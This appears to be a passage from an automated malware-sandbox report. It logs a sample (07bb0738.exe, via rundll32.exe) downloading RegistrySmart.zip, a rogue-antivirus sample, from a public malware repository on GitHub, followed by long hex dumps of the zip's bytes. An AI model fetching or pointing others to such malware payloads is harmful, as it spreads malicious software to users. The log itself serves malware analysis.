                                                                                                                                                    2022-09-29 12:59:20 UTC28774INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    111192.168.2.349763185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:20 UTC28776OUTGET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    112185.199.108.133443192.168.2.349763C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:20 UTC28776INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1070715
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "1d24269eaf781907e4c1af48234a4a75d4d097f07863219e5c2eb72d5943a4d9"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0807:0541:22EA5A:2E231E:63359360
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:20 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6937-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456360.353091,VS0,VE204
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 713aa51ed07acfc407a9d358b3fce5fc9b628146
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:20 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:20 UTC28777INData Raw: 50 4b 03 04 33 00 01 00 63 00 08 61 55 4d 00 00 00 00 a7 55 10 00 70 bc 10 00 1c 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 52 65 67 69 73 74 72 79 53 6d 61 72 74 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b9 21 09 4a 7c 9c 8c 4c 0e 36 13 b9 58 07 20 9e 22 2f 2c 6b 82 70 ca 5c 39 7c a2 07 a5 11 35 7e fb a8 14 c8 0b 2a 30 0d 8a 99 c6 3a 6c e3 c0 dd 0a 73 5d e0 4f f9 3d 77 f4 dd c6 8a 53 bd 95 5b bf 93 ed 29 b0 50 34 88 15 c0 df f0 38 87 1b 10 9a 47 02 e0 5e 8b 6b 46 62 90 ee 5d d7 84 5d a7 0d 75 91 86 35 f6 de 3c 6d 1e 2f 2c 76 e2 33 85 f7 8e a5 65 f5 55 8f b4 2f 6b c8 b3 69 8b 8e c0 30 10 e6 34 b8 b3 bf cc 26 be 1f 82 ab 82 ab f0 e5 f5 92 20 b1 91 e9 f6 fc d4 60 dd 90 07 74 75 c2 8d e1 92 61 da d5 e6 8a ff e7 b5 06 5d 4b c6 30 83 ae bb 41 2c 8c 23 73 7a
                                                                                                                                                    Data Ascii: PK3caUMUpEndermanch@RegistrySmart.exeAE!J|L6X "/,kp\9|5~*0:ls]O=wS[)P48G^kFb]]u5<m/,v3eU/ki04& `tua]K0A,#sz
                                                                                                                                                    2022-09-29 12:59:20 UTC28793INData Raw: ab 82 d6 f0 4f c9 70 d7 b5 cd 06 07 3c b0 7d d1 6d cb 29 bb 10 e5 2b 7a b9 33 e3 bf 11 3e 68 84 1b f6 b2 1e d9 c3 a2 1e 5d 9b 57 12 5d 85 d9 e1 d1 fa 9c 12 fa e3 af 9e 36 7f 31 40 3b 37 4f 76 85 cb ab 86 77 df 7f 60 d4 df 7a 21 a8 0c 84 d1 2c 4f 4b 6d 90 94 ea c2 20 f9 09 b4 05 91 38 53 0d de 9c 50 30 a6 7d bc 4c e2 73 f2 d2 0e 3b 2d 3e 4c 10 06 4f 43 32 7b c6 16 04 73 58 24 0a 19 fa eb ed fc b2 0e 18 fa 93 cb 4b 5a 95 50 16 d6 21 80 af f1 04 52 63 7d 2e 87 b0 60 cc 9d 85 a7 ef 35 da f7 52 99 2d 7e 57 bd e3 ec 08 9c e4 74 02 62 bc 8c c4 a7 a5 bf d8 37 52 dd 78 65 42 4a d4 6a a6 74 db ef f5 ca 7f 37 18 99 ce 05 51 9c 61 83 50 42 9b 89 17 85 3d 14 29 ac 28 37 ff 88 76 03 79 81 5b 2e f6 8f 0d b7 08 91 95 3c 8a 69 f8 60 ea 02 60 f5 99 ef 29 8a 62 c8 26 df 9d
                                                                                                                                                    Data Ascii: Op<}m)+z3>h]W]61@;7Ovw`z!,OKm 8SP0}Ls;->LOC2{sX$KZP!Rc}.`5R-~Wtb7RxeBJjt7QaPB=)(7vy[.<i``)b&
                                                                                                                                                    2022-09-29 12:59:20 UTC28809INData Raw: 18 96 1c a9 d8 a0 d5 eb 80 8e 38 ef c8 b8 c7 ec 17 14 aa 75 9d 84 73 4e c5 90 f0 f4 f6 25 7f b2 9d 51 fa 18 3a 62 5e c3 27 4b e0 2e d4 e4 00 f5 90 75 e5 36 ce 85 6b a0 96 f1 dd 38 42 9b c1 17 4b a0 42 6c d9 14 44 9a 72 ab 9d 51 e2 92 8e 21 8a 7b 0e c1 c2 90 0f 16 45 24 66 53 8b b9 48 e5 a2 ef eb a9 5e 51 a3 40 26 f5 8a 00 8a f5 f8 44 db 08 83 67 3d 96 86 31 56 55 1d d9 91 00 9a 4a 4c 00 ed 86 2e 96 74 76 3f e7 48 70 2a 9e b5 19 89 30 8f c7 3f 3f 35 e0 13 46 fb 41 24 1f 03 3d 27 cd 36 bd c0 69 81 67 03 29 53 d9 33 55 b6 ed 47 db ef e4 5b 1f 2b 33 dc 80 e5 5f b1 67 4b f5 2e 90 7c a9 80 46 6b 09 ff 9c 6f a0 ff cd 74 a2 56 33 36 fd a9 ac 0c ec 9f e1 d6 0e 38 46 6a 5c da 36 b5 d1 84 83 6c 98 c7 44 d5 a1 7a e9 92 73 0f 42 d7 74 ac 4b 82 67 db 03 30 13 b3 ed 70
                                                                                                                                                    Data Ascii: 8usN%Q:b^'K.u6k8BKBlDrQ!{E$fSH^Q@&Dg=1VUJL.tv?Hp*0??5FA$='6ig)S3UG[+3_gK.|FkotV368Fj\6lDzsBtKg0p
                                                                                                                                                    2022-09-29 12:59:20 UTC28825INData Raw: 81 9f d2 b8 a3 42 2f 08 c1 c6 cf 25 5a e5 6a 24 8a 3e d9 cc 23 a6 03 f7 59 8f 62 d0 e2 48 a9 94 16 df 39 19 a6 66 04 dc 1a 96 e6 2a d5 64 9f 0b dc 54 23 3e e6 d8 13 4a 20 b8 61 67 99 f4 7d b4 88 66 d5 9e 3c bd be 1f 2e 37 96 2e bc 36 ab eb 47 cb b9 72 af fd 22 eb 97 c6 7d d9 fd f3 38 7a a0 9b 26 f2 d3 b4 e1 e5 6a 5c cf 69 e4 da 89 43 09 0e 7a a7 af 94 9c a6 47 b2 08 cd 47 12 ee 76 7f 99 bc 95 d7 9a 52 55 cd a2 78 cb e8 f9 3d 9d c2 68 c4 49 ac b9 c5 53 2a 2d d4 9c 65 c0 90 5d e9 25 16 e6 70 18 2f c3 5d 61 6c 6b 01 13 ea cf 2d 05 4c 9f cd a7 3b 63 3c 6b a2 b2 b5 0f 1e 8c 37 cc f5 b9 17 76 ce fc f0 b0 bb 8d 16 17 28 10 b0 f4 4a 40 9f b8 75 5d b0 80 4c 35 58 71 fa e2 7c ba 97 c0 e3 60 aa 58 7a 25 1a 83 c8 19 27 5b d5 32 ed ba d8 d7 0c 36 61 7a 2c ff 5a f0 48
                                                                                                                                                    Data Ascii: B/%Zj$>#YbH9f*dT#>J ag}f<.7.6Gr"}8z&j\iCzGGvRUx=hIS*-e]%p/]alk-L;c<k7v(J@u]L5Xq|`Xz%'[26az,ZH
                                                                                                                                                    2022-09-29 12:59:20 UTC28841INData Raw: 8f 0a 03 cf 48 fe 07 d1 c2 2d f2 84 05 16 ed 32 b5 6d 9a c7 82 0e c0 3d 3f fb 54 86 19 fa 7e 85 03 90 7c 6b 9c f6 6f 8a 07 92 e1 96 47 0d fd d2 b3 f6 a5 d0 28 51 13 52 9a 92 8f 13 2a b7 53 34 d3 46 88 29 8e 5b 85 a7 d0 b7 ab 1a 12 ce e6 06 f9 88 6c 7c 6b 2f 55 37 b4 2c ab 95 3e 41 c9 fa 90 38 51 46 4e 42 ca 4f 3e f1 e0 03 d3 4b 18 06 fb 90 07 47 53 0f 8c e1 a0 65 ef 29 84 5d aa cf e2 4a dd 6f 95 bb 21 cf ad a7 74 18 20 37 d0 7d fb f1 7c cd 99 e8 52 2e 2a d4 fa 8d 0b d5 13 ef 89 f5 58 34 45 9b ad 6c d1 4c 4d 98 88 04 40 de b4 e2 ee 18 da ec 0f bc c2 8f f5 94 35 b4 9e a1 28 55 01 68 84 a4 2e 02 c1 88 ec f3 9d e2 27 23 a6 e0 2a 60 6d 0f 34 36 e4 f1 41 98 e2 f2 f8 34 11 41 04 a9 a1 d2 e7 6a ff 79 77 e3 f0 37 67 85 9b 56 29 7a d3 0f 44 97 22 1a 79 58 30 27 c3
                                                                                                                                                    Data Ascii: H-2m=?T~|koG(QR*S4F)[l|k/U7,>A8QFNBO>KGSe)]Jo!t 7}|R.*X4ElLM@5(Uh.'#*`m46A4Ajyw7gV)zD"yX0'
                                                                                                                                                    2022-09-29 12:59:20 UTC28857INData Raw: 76 54 37 29 88 15 71 a6 20 fe ab e7 8f fa b8 b2 07 f7 86 a1 dc 99 e0 ac 1f 7f b9 e3 5b 85 75 ee 9a 69 68 da 23 5a 81 6d 48 35 6f e8 e8 1e 22 93 11 50 29 0b a3 a4 91 1e e9 d8 40 88 26 47 42 28 fc e9 e8 b2 1f 8d 60 5c c0 b1 af ad 47 d3 e2 e9 bf bc 92 41 2d 5d da c6 92 92 5c 3e c6 e9 01 2f 81 2c 73 ce e3 10 f9 3c 21 ee ce a7 35 e9 c9 cf 65 07 4f 85 70 40 1c ab 92 6d ed 84 bf 07 b0 fa e6 80 ae 87 4d 84 fa a6 21 ff d0 83 2b 69 83 fc 81 f3 f5 0a ad e9 c3 c2 ba d8 d1 eb 5e ec 56 56 c6 5f 8f 78 cb 2c 41 ab 72 67 01 2a c6 87 86 5e e9 4c 09 4a ad 3e 4d 8d 18 ec 1a e1 1a 2b 18 eb 7f ad f9 6a cf e8 2f d6 5e bd 40 82 19 91 aa 21 0e 81 db 11 96 71 a2 be 0d 26 58 82 97 50 72 d2 ff 67 ee 1c 9d db 57 a6 6e b3 76 bd 84 8e 7e cf bc 95 47 8c 2b e1 30 81 ae 2b 83 63 e3 7e fb
                                                                                                                                                    Data Ascii: vT7)q [uih#ZmH5o"P)@&GB(`\GA-]\>/,s<!5eOp@mM!+i^VV_x,Arg*^LJ>M+j/^@!q&XPrgWnv~G+0+c~
                                                                                                                                                    2022-09-29 12:59:20 UTC28873INData Raw: 4a d9 4a ae 0a 02 6f 30 30 7f 34 b9 77 43 0d 64 09 43 11 7d 18 92 38 ca bb 3f 78 49 6e d1 67 9f a5 91 1b 60 74 d5 f2 1a d6 9c e2 09 97 5f 31 6f 74 f7 1d 10 da 18 71 b6 cb 5f 87 70 49 84 97 33 c0 c9 cd d0 e2 ac aa 19 93 a2 2d 99 10 51 b3 e8 f4 fa 57 cb 5f c7 5f a5 1c e9 26 1e 93 2d f2 3e 6f 11 3a b9 92 64 2e c2 85 62 37 fc bf c7 dd 81 69 de 57 e1 d4 fc 4b 6f da 86 af ea 3c e0 e5 d6 59 78 b7 b9 64 13 a3 65 f8 24 a1 26 93 cc 65 d1 20 3f 77 3d ed bf 35 fc bd d7 0d 75 0e 38 47 2d da 3f 0b 03 12 5b 55 17 21 1a 8b 63 54 eb 0a 22 ca 85 69 85 e2 95 5f 6b 15 4b 5c 9c d3 78 24 ae a6 7e 66 15 24 02 0e d5 c3 33 05 68 7f 8d 9c 6a 47 21 94 a0 f8 7d 1b 2b f5 51 d1 04 0f 82 e7 96 c6 19 00 c8 b0 4f 60 fa 17 5c ad c9 4c c8 8c 71 02 90 55 d9 df 8e 86 0b d4 68 02 15 a7 6a 1c
                                                                                                                                                    Data Ascii: JJo004wCdC}8?xIng`t_1otq_pI3-QW__&->o:d.b7iWKo<Yxde$&e ?w=5u8G-?[U!cT"i_kK\x$~f$3hjG!}+QO`\LqUhj
                                                                                                                                                    2022-09-29 12:59:20 UTC28889INData Raw: ef 41 85 03 4b 42 a5 6b ba 26 30 5e d9 37 3f 7b c1 c7 34 50 04 71 6b 23 ad 50 c4 1e e7 f9 39 d2 8e f5 b7 90 d7 bb 5c 63 bf bf ec a7 81 5b 77 0e 41 4b 4e 6f 0c 64 4e e9 cf 73 c6 3d 6e 24 4a 09 f2 fb f3 ac 4c 37 c4 fb 6d d3 6b df 5c 9d 39 35 8d 59 b0 f3 42 f8 1d 8e 85 5c 94 04 2a a1 95 99 4c e4 16 ea d8 d2 40 a7 ff f0 7f 4e 1a 67 7a b4 e4 f3 f1 6a 91 74 17 65 66 d5 0b 92 cd 01 e7 60 1e c4 f9 a4 bb 24 5d 2e 70 38 10 b4 a0 28 c9 f9 fb 24 28 0b 18 83 d9 e4 a6 d4 5f 96 a4 f5 e9 1c 34 8e 83 e8 1a d7 f3 be 5f 3f 01 60 27 bb e9 20 15 41 54 92 a0 b3 09 ff f8 63 2a c6 74 3e c2 b6 4d 16 2c bc 06 5c 5a ef f9 84 8d ab 72 33 a5 6f 86 f0 24 5d c4 21 eb 17 0b 00 e3 6b e4 79 8f eb d7 08 82 3a 8a 18 bc fb bd 42 02 51 22 b7 22 e0 0c 19 7f 63 e7 39 84 51 aa 8d c8 17 b9 58 16
                                                                                                                                                    Data Ascii: AKBk&0^7?{4Pqk#P9\c[wAKNodNs=n$JL7mk\95YB\*L@Ngzjtef`$].p8($(_4_?`' ATc*t>M,\Zr3o$]!ky:BQ""c9QX
                                                                                                                                                    2022-09-29 12:59:20 UTC28905INData Raw: 8f 6a 4e a0 2a ac cd ff 9a a9 a2 6f 5a fb 14 b5 11 d9 c5 ad e8 8b e7 f5 3d 16 28 ba 15 93 dc ce 91 0d bd db f4 de 03 79 75 16 e9 f6 6a ab 33 aa ff a8 9b 6f b1 7c a2 a3 30 0b 82 9f 46 e0 36 50 9c 1f 40 d8 0b 70 34 a5 25 3d 18 90 aa 11 a7 cf c5 2c ad a1 e5 c7 af 0c 7f 1f bb 6a 36 30 bf 57 89 39 95 a6 40 48 ab d1 bb 90 70 fb 6c 28 d6 d2 96 5b f3 44 60 d8 61 b7 54 e6 ec 45 25 70 47 b4 29 57 b8 16 a0 a5 ba ac b6 6a 47 83 fe 6f 64 8b 3a b5 b1 5b ea de 6f 31 3a 8d e7 cd 77 e6 12 7c 9c 8f df aa 6c 2d 34 bd 74 a6 b8 82 0c 15 e8 a9 1f 8f c9 41 0a f0 44 69 f5 45 70 a3 f5 f0 bb 48 3d a1 49 19 51 39 43 20 ce 7a 3a 28 fd 8a 4b 25 11 7c be 91 da 93 0b ab 05 ca 33 6d 19 70 a5 cc e2 24 17 21 1a 51 0b 56 c3 04 60 fe 9b 97 86 94 be 30 13 63 48 4b d0 ef 6b 54 be 88 8e c6 38
                                                                                                                                                    Data Ascii: jN*oZ=(yuj3o|0F6P@p4%=,j60W9@Hpl([D`aTE%pG)WjGod:[o1:w|l-4tADiEpH=IQ9C z:(K%|3mp$!QV`0cHKkT8
                                                                                                                                                    2022-09-29 12:59:20 UTC28921INData Raw: 3b d5 8c 08 e1 e8 5b e4 70 e7 93 46 37 61 85 f2 83 10 21 d8 9d 07 12 8d 05 d2 0a a7 2b dd 81 ec b2 a7 29 c5 b7 7e 22 2e 0b 4a 48 80 d9 49 78 de bc e2 5e b9 23 96 3d fc 37 d4 f3 ea f8 27 76 c7 56 4a 06 20 80 28 27 c0 68 32 cb 3e 79 87 72 e6 25 1a af f1 f3 7e 1c bb 6b dc 24 22 ac be 31 ea 30 89 23 bc 2e 37 00 9a f4 57 f2 b7 69 e4 36 af 36 4d 23 91 1f 68 4a cf 8d 97 b4 c1 d2 e6 15 30 d9 ae ae a4 5b 10 5d ff 0d d3 7d 88 67 2b 20 56 4a 3c 60 ee 19 7c 97 ac c2 96 1d 63 f9 3b c9 3e dd 7a a7 6f 93 54 c6 99 0a 91 d8 8e 18 7a d3 ca 68 00 1b cb 0d e9 78 2f 5a 4e 79 7d ed c1 75 9f 7d 37 f0 3c bd 80 c7 08 19 a8 19 72 1f 05 71 1e e7 5f f0 51 63 3c a5 1f db 67 25 ca 81 0e ea 40 86 d1 94 ab b8 70 81 85 f7 df 4b 2d ad f1 57 ab 88 23 5b 00 32 1f e4 f1 34 2b 84 a9 34 63 1b
                                                                                                                                                    Data Ascii: ;[pF7a!+)~".JHIx^#=7'vVJ ('h2>yr%~k$"10#.7Wi66M#hJ0[]}g+ VJ<`|c;>zoTzhx/ZNy}u}7<rq_Qc<g%@pK-W#[24+4c
                                                                                                                                                    2022-09-29 12:59:20 UTC28937INData Raw: 1a 88 64 aa 2b f2 c0 60 5e 9d b5 ed a9 4b 47 16 4b 25 86 0d b0 7c dc 9c 04 a2 d9 f2 57 bd be ab 0c d4 0c fb 1a 31 4f 7e 72 57 fc 9a bf 2a ee 8f 4e 66 70 44 1a b5 91 60 ff a4 43 09 e1 78 e5 f8 a1 ee 2d 07 dd 60 62 93 40 c4 55 78 44 76 49 d4 34 43 3e 28 41 e0 10 f6 69 93 fe a6 3a 3d ac bf 37 d3 27 33 b3 cd 0e f4 8e cc c7 51 66 72 99 29 08 48 c6 17 4a ca 2a 09 12 45 29 02 e8 4b 8c 03 0b c9 07 4d d0 89 13 28 9f b2 84 45 fd 74 5b 86 41 42 ec e1 fb fd 2b 54 ff 71 8e ab ba 0c c6 e1 a3 47 5c 5a 13 2e dc b3 d0 9b 90 94 49 05 a1 80 d7 a0 fb ff de 8e 1c 09 52 64 0b 8a 76 09 76 17 01 9a 79 f6 52 e2 3c d9 92 2a e9 02 78 9d 8c 30 c6 15 17 4c be 18 0a 4b d4 20 02 4a e6 a8 fa fd ec c6 67 79 fb c1 1b 47 50 4c 6b ea 93 9b a1 4e a9 c8 fd 47 57 07 79 6c 87 dc 39 6f 1e aa cf
                                                                                                                                                    Data Ascii: d+`^KGK%|W1O~rW*NfpD`Cx-`b@UxDvI4C>(Ai:=7'3Qfr)HJ*E)KM(Et[AB+TqG\Z.IRdvvyR<*x0LK JgyGPLkNGWyl9o
                                                                                                                                                    2022-09-29 12:59:20 UTC28953INData Raw: 8d b2 f6 78 fa 4e aa 1a a6 67 ac f9 e2 f7 ee 9d 60 db fc 88 3e 4a d9 8d 6b 82 e8 61 9a 43 94 30 4b 89 e5 27 f9 dc 62 f2 ff 7b 89 56 e6 a0 3a a4 8c 02 7a ca f6 56 c7 71 27 c1 d9 c1 b4 5b cc 54 99 9e ca ab 5e bb 96 d5 bd a0 e2 76 83 92 bb d3 01 f6 b5 79 d0 cc fa ae e1 c2 1f 81 1c 54 5d ae 48 07 f8 38 a9 b7 e3 8b 5e e1 a5 7a 8c e4 cf 78 00 33 22 6b 15 b2 84 2d 41 a8 c7 9c 5c b1 4e 6a 4f ce c0 77 bf 0a 0d af e4 ea 43 70 3e 63 85 bd 0b b2 28 bc 0b b4 e0 93 fd ee f9 41 40 f5 b6 0d b5 85 53 cf 67 5c 28 88 5e 03 36 4f 7d 05 9f da c9 95 06 77 02 12 3a a4 8c 0b 01 84 9d 22 27 4d 5c 60 41 1f 0d e0 bb b9 e0 cb 9e 4b 65 ee e1 b2 4e 12 5c d9 db 7d 70 e9 4d c6 cd ef 23 30 98 94 cf 6b 1c a2 25 9c 99 4c fc 3a 55 25 df 93 bd 1c 0e ae 94 48 c9 2e ce 70 d3 d1 8b 02 6a be 32
                                                                                                                                                    Data Ascii: xNg`>JkaC0K'b{V:zVq'[T^vyT]H8^zx3"k-A\NjOwCp>c(A@Sg\(^6O}w:"'M\`AKeN\}pM#0k%L:U%H.pj2
                                                                                                                                                    2022-09-29 12:59:20 UTC28969INData Raw: fb 49 46 f3 14 91 f6 63 76 86 f2 7b 78 f7 50 39 3d 2e e2 5b 52 62 f6 cb 1d ae 37 eb 95 3d b2 35 48 66 b2 b9 35 71 2b c2 1b 3f bf 29 5d d0 28 03 60 27 ce 53 3d cd ad 63 11 17 24 b3 91 62 27 50 8e 7f 77 59 1f 62 e4 f5 f1 83 d6 91 d8 db 6a 19 00 7c bf a3 2f 8a 5e 94 d5 98 4f a3 cc ed d0 20 c2 d6 d1 04 b8 a0 bb 6d 23 33 6b 53 51 73 0d f3 02 03 3f dd 34 16 d3 8d bb b9 c8 f8 82 fc 35 fe 18 7b 05 18 9a 27 cc 03 6b f1 e0 bf 03 0b fa 3d 09 6e 4b 5b 02 38 45 a1 0b f0 cc cd 2e 2a 7b dc e3 fa 04 0b 07 53 b8 18 94 2b 84 70 e5 9e cf 76 96 56 0b f9 09 81 ef 8e b7 c6 e4 45 d1 ec 94 0a 80 34 ca 48 c8 f4 93 a3 c0 8a bf c3 de 50 31 1c 71 25 2c df 36 c9 a6 20 b9 29 ce 95 70 11 15 5d c3 7b 28 4c 8f 52 17 d4 2e 74 0c 3e 50 24 da db 52 8c 7c 61 f7 d7 16 e0 c3 13 58 2d 16 73 07
                                                                                                                                                    Data Ascii: IFcv{xP9=.[Rb7=5Hf5q+?)](`'S=c$b'PwYbj|/^O m#3kSQs?45{'k=nK[8E.*{S+pvVE4HP1q%,6 )p]{(LR.t>P$R|aX-s
                                                                                                                                                    2022-09-29 12:59:20 UTC28985INData Raw: b3 7d 0c 1b 31 dd 40 2a 79 2d dc 2c a8 ab 38 bc e1 62 cf a2 4b b9 e0 32 97 0b af d4 5f d1 5d 3e f9 ce cd 0f a5 53 58 9f c4 42 38 92 27 59 18 be 78 7f 69 d7 54 a3 cf ec a8 5d 66 5e 5f 69 dd 1b 69 81 be b9 a1 d4 0b f4 d5 3e b6 50 58 7c 41 28 5b d5 2c 0e 5e 6d ed a3 6d e2 99 c1 06 b8 d7 12 76 76 79 9b 7b 25 d5 11 b0 ac 21 a1 29 09 10 b4 ec e1 78 5c 2e 08 3a de 3f e9 67 7c 72 86 0a cf df cf c0 80 a1 53 f8 c3 eb 9d 7a 60 ca d0 c3 18 e3 a4 86 4b d7 1c 71 87 18 23 ef af 8b 53 c7 23 64 b6 9f f9 15 ce 4d a1 a5 c8 43 d4 d9 05 1b 0f 82 a9 fd 5f 03 73 7d 3f fd 62 d8 c5 6d f2 03 37 ee c3 d1 2c 88 2a 8c ee 5e c0 70 2b 71 1a 11 ee bb b7 56 0f bf f5 fa 00 24 cc 65 13 9c 3c 6f 78 54 73 aa 6b 8e 97 87 36 09 76 6a 2c ba 22 2d e4 dc 87 d6 c9 c4 ab 76 d4 c3 af 34 2e da 24 bb
                                                                                                                                                    Data Ascii: }1@*y-,8bK2_]>SXB8'YxiT]f^_ii>PX|A([,^mmvvy{%!)x\.:?g|rSz`Kq#S#dMC_s}?bm7,*^p+qV$e<oxTsk6vj,"-v4.$
                                                                                                                                                    2022-09-29 12:59:20 UTC29001INData Raw: d0 87 e6 24 7d d5 66 5d c7 5b 04 d0 52 51 ff 4d 96 e0 cf 5c 11 21 93 ba cd fb f7 a3 b2 0b fc e8 08 e4 a3 05 18 0f b0 69 31 7d 40 21 45 f4 0d 88 85 00 d1 06 4c 08 d5 ee 0b 51 35 78 00 69 89 b9 8a 18 cc 42 b9 fe 41 7f 96 fe af 83 0f 9d 11 d5 54 23 b9 7d 46 55 9f bb a2 e1 32 51 56 87 5a 08 de 3c 0c e5 3b 1e ff ea b7 17 4c 26 c1 6f d0 d5 ed c9 7e 2c 3a a4 c8 42 da 48 e1 46 56 e5 e5 48 2b d4 a6 53 d2 d5 6b b0 a8 ed dd ff 2e a7 c9 cf 0a 8c e1 fa ba 85 e8 e8 12 b2 88 56 69 df e0 bf 31 7a 22 30 62 f0 64 c4 fb e7 de ce e2 2b 46 d3 52 88 c6 b6 4c 65 77 c5 a4 90 31 90 b0 b4 f5 cc d6 12 2b 6f d2 24 ca 40 be d7 38 83 5d 91 52 b1 b6 63 06 b0 a9 5a 32 7b ba 9a 23 af c7 91 3b a1 9d 06 41 05 5b fb 9e f6 50 e4 47 18 0d 12 e9 ab 06 9f 87 52 b2 c9 66 8e aa dc c3 f2 06 7d ca
                                                                                                                                                    Data Ascii: $}f][RQM\!i1}@!ELQ5xiBAT#}FU2QVZ<;L&o~,:BHFVH+Sk.Vi1z"0bd+FRLew1+o$@8]RcZ2{#;A[PGRf}
                                                                                                                                                    2022-09-29 12:59:20 UTC29017INData Raw: 5d 26 99 c4 68 f4 32 ab ed 08 9c a6 ab c8 51 b9 d4 6c 14 5d bb c4 d5 b2 90 34 f0 70 9d 28 ca 4d b2 2b 69 6f 26 16 a8 55 03 7e 3a 77 7f f8 de 44 33 91 63 2e a6 d6 d4 64 77 63 87 06 d2 1f bf 7e 00 82 0f 6e 16 da 66 e0 68 b3 f1 14 48 1b c2 a8 dd 99 cc ac 6c ce 3c d3 5d 50 7e 33 d4 b3 e0 c0 b5 a4 e1 5d 70 c9 45 59 f1 d7 92 43 9e 28 5b ef a4 97 63 ed 46 63 07 21 6e c2 79 0b 8e 6a 47 f1 f3 2a 61 c8 ed 2b 0e 7e b9 13 35 17 a0 4d ba 8c 2b 4c 87 2b 5e 00 d9 3c 8b 06 4f a9 d3 6a ae 54 36 09 b6 56 8c dd b3 94 62 fc 03 59 ea 01 6f 31 c3 6e 8f 3c 3e c1 8b a8 9f bf 09 e6 ee f9 a0 c3 38 a2 c3 1a 01 8d cd 9f 39 d2 51 62 e3 c4 a4 f7 42 c1 a3 51 5f ea 11 31 19 53 e8 9f 4c ff 26 91 5b a1 a4 18 44 be fa 9b b3 a6 db 6e 53 2a 2f 71 79 7d 19 61 ba ac 6d 42 5c 92 b6 95 82 da d4
                                                                                                                                                    Data Ascii: ]&h2Ql]4p(M+io&U~:wD3c.dwc~nfhHl<]P~3]pEYC([cFc!nyjG*a+~5M+L+^<OjT6VbYo1n<>89QbBQ_1SL&[DnS*/qy}amB\
                                                                                                                                                    2022-09-29 12:59:20 UTC29033INData Raw: 9b 44 d3 82 63 c1 58 90 49 73 8b 2d 83 70 00 d0 ce 40 bb f3 f0 3d 5d d3 7f e9 eb 9f 65 3e 0a 7c cb 06 23 80 a0 ba 46 a3 ed f0 d1 27 cd ee 89 52 be e8 c3 04 31 71 be 98 9f 8a 4c 20 1e 4c af 09 b5 82 55 76 32 58 4e 93 6d 47 0a d8 0d 7f c8 17 dd a0 10 c0 47 54 70 b3 92 35 9b 11 10 45 49 1e 09 5f 69 62 5e 54 b0 6a b3 fa 0b b4 00 d3 03 d0 b9 7e 5f a3 68 f5 27 c5 6f 22 b7 24 1b 47 ec 6a d9 4d 32 d2 1d 45 8f 53 68 fb a4 35 af c2 9f dd a4 b8 73 de a0 b4 6e 6b 43 dd 30 bb fe cf 29 67 df 2d 43 06 74 50 50 03 dd 60 c1 ef d4 fa 6a 5d d8 de 42 68 d3 06 b5 dd 96 02 f4 8e 73 dd bb 15 74 bf 38 ca 0e 31 97 b8 8a 16 8e fb 40 de 11 e8 4f d9 6a 87 36 6c bf 1d 59 4d a5 a2 02 dc 0d a0 d1 3b de 56 fc 3d 82 3e 2e 8e ec b7 60 32 fb 4d c2 56 fd 1f d2 a8 bd 45 c3 af 7a 5b 1a 57 1f
                                                                                                                                                    Data Ascii: DcXIs-p@=]e>|#F'R1qL LUv2XNmGGTp5EI_ib^Tj~_h'o"$GjM2ESh5snkC0)g-CtPP`j]Bhst81@Oj6lYM;V=>.`2MVEz[W
